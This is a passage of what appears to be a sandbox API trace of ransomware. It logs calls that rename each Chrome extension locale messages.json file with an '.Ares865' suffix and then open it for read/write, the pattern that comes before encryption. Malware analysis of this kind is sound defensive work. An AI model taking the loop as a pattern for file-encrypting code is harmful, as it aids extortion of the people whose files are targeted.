Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" [0100.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.Ares865") returned 169 [0100.315] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21907) returned 1 [0100.323] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" [0100.323] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.Ares865") returned 169 [0100.323] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22077) returned 1 [0100.334] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw" [0100.334] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.Ares865") returned 169 [0100.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16011) returned 1 [0100.343] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv" [0100.343] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.Ares865") returned 169 [0100.343] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.345] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16022) returned 1 [0100.359] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr" [0100.360] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.Ares865") returned 169 [0100.360] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.362] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18881) returned 1 [0100.366] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl" [0100.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.Ares865") returned 169 [0100.367] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16506) returned 1 [0100.372] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk" [0100.373] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.Ares865") returned 169 [0100.373] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.374] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16637) returned 1 [0100.377] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru" [0100.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.Ares865") returned 169 [0100.378] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18702) returned 1 [0100.383] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" [0100.383] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.Ares865") returned 169 [0100.383] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.385] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16603) returned 1 [0100.388] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" [0100.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.Ares865") returned 172 [0100.389] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.390] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16348) returned 1 [0100.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" [0100.394] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 